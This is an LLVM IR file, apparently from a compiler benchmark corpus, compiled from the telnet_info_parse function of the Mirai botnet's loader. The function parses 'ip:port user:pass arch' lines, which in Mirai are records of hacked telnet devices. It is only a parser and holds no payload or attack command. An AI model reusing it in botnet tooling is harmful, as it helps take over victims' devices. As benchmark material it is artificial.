; ModuleID = '/home/carl/AnghaBench/Mirai-Source-Code/loader/src/extr_telnet_info.c_telnet_info_parse.c'
source_filename = "/home/carl/AnghaBench/Mirai-Source-Code/loader/src/extr_telnet_info.c_telnet_info_parse.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.telnet_info = type { i32 }

@.str = private unnamed_addr constant [2 x i8] c" \00", align 1
@.str.1 = private unnamed_addr constant [2 x i8] c":\00", align 1
@.str.2 = private unnamed_addr constant [1 x i8] zeroinitializer, align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local %struct.telnet_info* @telnet_info_parse(i8* %0, %struct.telnet_info* %1) #0 {
  %3 = alloca %struct.telnet_info*, align 8
  %4 = alloca i8*, align 8
  %5 = alloca %struct.telnet_info*, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i8*, align 8
  %8 = alloca i8*, align 8
  %9 = alloca i8*, align 8
  %10 = alloca i8*, align 8
  %11 = alloca i8*, align 8
  %12 = alloca i8*, align 8
  %13 = alloca i32, align 4
  %14 = alloca i32, align 4
  store i8* %0, i8** %4, align 8
  store %struct.telnet_info* %1, %struct.telnet_info** %5, align 8
  store i8* null, i8** %11, align 8
  store i8* null, i8** %12, align 8
  %15 = load i8*, i8** %4, align 8
  %16 = call i8* @strtok(i8* %15, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str, i64 0, i64 0))
  store i8* %16, i8** %6, align 8
  %17 = icmp eq i8* %16, null
  br i1 %17, label %18, label %19

18:                                               ; preds = %2
  store %struct.telnet_info* null, %struct.telnet_info** %3, align 8
  br label %70

19:                                               ; preds = %2
  %20 = call i8* @strtok(i8* null, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str, i64 0, i64 0))
  store i8* %20, i8** %7, align 8
  %21 = icmp eq i8* %20, null
  br i1 %21, label %22, label %23

22:                                               ; preds = %19
  store %struct.telnet_info* null, %struct.telnet_info** %3, align 8
  br label %70

23:                                               ; preds = %19
  %24 = call i8* @strtok(i8* null, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str, i64 0, i64 0))
  store i8* %24, i8** %8, align 8
  %25 = load i8*, i8** %6, align 8
  %26 = call i8* @strtok(i8* %25, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  store i8* %26, i8** %9, align 8
  %27 = icmp eq i8* %26, null
  br i1 %27, label %28, label %29

28:                                               ; preds = %23
  store %struct.telnet_info* null, %struct.telnet_info** %3, align 8
  br label %70

29:                                               ; preds = %23
  %30 = call i8* @strtok(i8* null, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  store i8* %30, i8** %10, align 8
  %31 = icmp eq i8* %30, null
  br i1 %31, label %32, label %33

32:                                               ; preds = %29
  store %struct.telnet_info* null, %struct.telnet_info** %3, align 8
  br label %70

33:                                               ; preds = %29
  %34 = load i8*, i8** %7, align 8
  %35 = call i32 @strlen(i8* %34)
  %36 = icmp eq i32 %35, 1
  br i1 %36, label %37, label %53

37:                                               ; preds = %33
  %38 = load i8*, i8** %7, align 8
  %39 = getelementptr inbounds i8, i8* %38, i64 0
  %40 = load i8, i8* %39, align 1
  %41 = sext i8 %40 to i32
  %42 = icmp eq i32 %41, 58
  br i1 %42, label %43, label %44

43:                                               ; preds = %37
  store i8* getelementptr inbounds ([1 x i8], [1 x i8]* @.str.2, i64 0, i64 0), i8** %11, align 8
  store i8* getelementptr inbounds ([1 x i8], [1 x i8]* @.str.2, i64 0, i64 0), i8** %12, align 8
  br label %52

44:                                               ; preds = %37
  %45 = load i8*, i8** %7, align 8
  %46 = getelementptr inbounds i8, i8* %45, i64 0
  %47 = load i8, i8* %46, align 1
  %48 = sext i8 %47 to i32
  %49 = icmp ne i32 %48, 63
  br i1 %49, label %50, label %51

50:                                               ; preds = %44
  store %struct.telnet_info* null, %struct.telnet_info** %3, align 8
  br label %70

51:                                               ; preds = %44
  br label %52

52:                                               ; preds = %51, %43
  br label %57

53:                                               ; preds = %33
  %54 = load i8*, i8** %7, align 8
  %55 = call i8* @strtok(i8* %54, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  store i8* %55, i8** %11, align 8
  %56 = call i8* @strtok(i8* null, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  store i8* %56, i8** %12, align 8
  br label %57

57:                                               ; preds = %53, %52
  %58 = load i8*, i8** %9, align 8
  %59 = call i32 @inet_addr(i8* %58)
  store i32 %59, i32* %13, align 4
  %60 = load i8*, i8** %10, align 8
  %61 = call i32 @atoi(i8* %60)
  %62 = call i32 @htons(i32 %61)
  store i32 %62, i32* %14, align 4
  %63 = load i8*, i8** %11, align 8
  %64 = load i8*, i8** %12, align 8
  %65 = load i8*, i8** %8, align 8
  %66 = load i32, i32* %13, align 4
  %67 = load i32, i32* %14, align 4
  %68 = load %struct.telnet_info*, %struct.telnet_info** %5, align 8
  %69 = call %struct.telnet_info* @telnet_info_new(i8* %63, i8* %64, i8* %65, i32 %66, i32 %67, %struct.telnet_info* %68)
  store %struct.telnet_info* %69, %struct.telnet_info** %3, align 8
  br label %70

70:                                               ; preds = %57, %50, %32, %28, %22, %18
  %71 = load %struct.telnet_info*, %struct.telnet_info** %3, align 8
  ret %struct.telnet_info* %71
}

declare dso_local i8* @strtok(i8*, i8*) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @inet_addr(i8*) #1

declare dso_local i32 @htons(i32) #1

declare dso_local i32 @atoi(i8*) #1

declare dso_local %struct.telnet_info* @telnet_info_new(i8*, i8*, i8*, i32, i32, %struct.telnet_info*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
